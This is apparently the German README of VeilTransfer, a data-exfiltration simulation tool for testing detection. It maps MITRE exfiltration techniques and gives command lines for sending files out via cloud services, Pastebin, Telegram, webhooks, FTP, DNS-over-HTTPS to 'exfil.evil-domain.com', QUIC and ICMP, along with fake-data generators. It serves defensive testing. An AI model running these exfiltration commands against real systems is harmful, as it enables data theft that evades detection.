
VeilTransfer ist ein Daten-Exfiltrationstool, das dazu entwickelt wurde, die Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Daten-Exfiltrationstechniken, die von fortschrittlichen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern.
VeilTransfer ist ein Datenerfiltrations-Tool, das entwickelt wurde, um Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Datenerfiltrations-Techniken, die von fortgeschrittenen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern. Durch die Nutzung mehrerer Exfiltrationsmethoden wie MEGA, GitHub, SFTP, WebDAV und mehr hilft VeilTransfer dabei, Lücken in Ihren Abwehrmaßnahmen zu identifizieren und stellt sicher, dass Ihre Sicherheitslösungen darauf vorbereitet sind, modernen Datenschutzverletzungen entgegenzuwirken.
| ID | Techniken |
|---|---|
| T1029 | Geplante Übertragung |
| T1020 | Automatisierte Exfiltration |
| T1132.001 | Datenkodierung: Standardkodierung |
| T1560.002 | Gesammelte Daten archivieren: Archivierung über Bibliothek |
| T1567.001 | Exfiltration über Webdienst: Exfiltration in Code-Repository |
| T1567.002 | Exfiltration über Webdienst: Exfiltration in Cloud-Speicher |
| T1567.003 | Exfiltration über Webdienst: Exfiltration in Textspeicher |
| T1567.004 | Exfiltration über Webdienst: Exfiltration über Webhook |
| T1048.003 | Exfiltration über alternatives Protokoll: Exfiltration über unverschlüsseltes Nicht-C2-Protokoll |
| T1048.002 | Exfiltration über alternatives Protokoll: Exfiltration über asymmetrisch verschlüsseltes Nicht-C2-Protokoll |
VeilTransfer unterstützt auch die Erzeugung von Fake-Daten, einschließlich:
Erstellen Sie einfach Zip-Dateien zum Bündeln und Komprimieren von Daten, die dann für die Exfiltration oder zum Testen verschiedener Szenarien verwendet werden können. Unterstützt optional die Aufteilung in mehrere Dateien basierend auf der Größe.
Dieses Beispiel zeigt, wie eine Datei mithilfe des SFTP-Protokolls sicher an einen entfernten Server übertragen wird. Die Datei befindet sich auf dem lokalen Rechner und wird mithilfe der SSH-Authentifizierung in das angegebene entfernte Verzeichnis übertragen.
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass
In diesem Beispiel werden Dateien aus einem lokalen Verzeichnis auf einen WebDAV-Server hochgeladen. Der Server erfordert für die Authentifizierung einen Benutzernamen und ein Passwort. Der Serverparameter enthält das URI-Schema (https:// oder http://).
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass
Dieses Beispiel zeigt, wie Dateien an den Mega-Cloud-Speicher übertragen werden. Die Dateien werden aus einem angegebenen lokalen Verzeichnis hochgeladen, und die Authentifizierung erfolgt über die Mega-Cloud-Anmeldedaten des Benutzers.
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword
In diesem Beispiel wird eine Datei auf einen FTP-Server hochgeladen. Die Datei wird in ein bestimmtes Verzeichnis auf dem entfernten Server übertragen. Der Server erfordert für die Authentifizierung einen Benutzernamen und ein Passwort.
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword
Dieses Beispiel zeigt, wie der Inhalt einer Datei auf Pastebin hochgeladen wird. Der Inhalt wird mithilfe eines vom Benutzer bereitgestellten API-Schlüssels auf Pastebin veröffentlicht.
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key
Dieses Beispiel zeigt, wie eine Datei vom lokalen Rechner in ein bestimmtes GitHub-Repository übertragen wird. Die Datei wird mithilfe des GitHub-API-Tokens des Benutzers zur Authentifizierung zum Repository hinzugefügt.
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token
Dieses Beispiel zeigt, wie eine Datei an einen bestimmten Telegram-Kanal gesendet wird. Die Datei wird mithilfe eines Telegram-Bot-API-Tokens gesendet, und die Nachricht wird an die angegebene Kanal-ID zugestellt.
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789
In diesem Beispiel wird der Inhalt einer Datei an eine angegebene Webhook-URL gesendet.
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url
Um einen sicheren Datenerfiltrationsmechanismus mithilfe von DNS over HTTPS (DoH) einzurichten, müssen die folgenden DNS-Einträge konfiguriert werden:
A-Eintrag: Zeigen Sie test auf die IP-Adresse <VeilTransfer_IP_Address>.
test -> <VeilTransfer_IP_Address>
NS-Eintrag: Definieren Sie eine Subdomain (exfil), die von evil-domain.com verwaltet wird.
exfil -> test.evil-domain.com
Die Domäne exfil.evil-domain.com dient als DNS-Exfil-Domäne.
Starten Sie dann den VeilTransfer-Server im DoH-Modus mit dem folgenden Befehl:
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil
Hinweis: Der Verschlüsselungsschlüssel (-key) muss 16 oder 32 Zeichen lang sein.
Um Dateien über DoH hochzuladen, stellen Sie sicher, dass der VeilTransfer-Server mit einem gültigen Verschlüsselungsschlüssel aktiv im DoH-Modus läuft. Starten Sie dann die Übertragung mit dem Client-Befehl:
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com
Um den VeilTransfer-Server im QUIC-Modus zu starten, verwenden Sie den folgenden Befehl:
veiltransfer_server quic -cert /path/server.crt -key /path/server.key
Sobald der Server läuft, können Sie Dateien oder Verzeichnisse hochladen mit:
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443
Um Dateiübertragungen über das ICMP-Protokoll zu ermöglichen, starten Sie den VeilTransfer-Server im ICMP-Modus, indem Sie den folgenden Befehl ausführen:
veiltransfer_server_linux icmp -folder /path/folder
Sobald der Server aktiv ist, führen Sie den folgenden Befehl aus, um Dateien oder Verzeichnisse über ICMP zu übertragen:
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>
Erstellt ein Zip-Archiv aus einem angegebenen Verzeichnis.
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip
Erstellt ein Zip-Archiv, das basierend auf der angegebenen Größe in mehrere Teile aufgeteilt wird.
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000
Dieses Beispiel zeigt, wie 100 Einträge gefälschter Kreditkartendaten generiert werden. Die generierten Daten enthalten Kreditkartennummern, Ablaufdaten und zugehörige Details.
veiltransfer_client generate-fake -ccn -count 100
Dieses Beispiel zeigt, wie 50 Einträge gefälschter KTP-Daten generiert werden, bei denen es sich um indonesische Personalausweise handelt. Die Daten enthalten persönliche Informationen wie Name, Adresse und KTP-Nummer.
veiltransfer_client generate-fake -ktp -count 50
Die generierten Daten enthalten Social Security Numbers, die nach US-amerikanischen Standards formatiert sind.
veiltransfer_client generate-fake -ssn -count 200
Dieses Beispiel zeigt, wie 300 gefälschte Krankenakten auf Englisch generiert werden.
veiltransfer_client generate-fake -medical-record -count 300 -language en
Beiträge zu VeilTransfer sind willkommen! Wenn Sie Ideen für neue Funktionen, Exfiltrationsmethoden oder Verbesserungen haben, reichen Sie bitte einen Pull-Request ein oder eröffnen Sie ein Issue auf GitHub.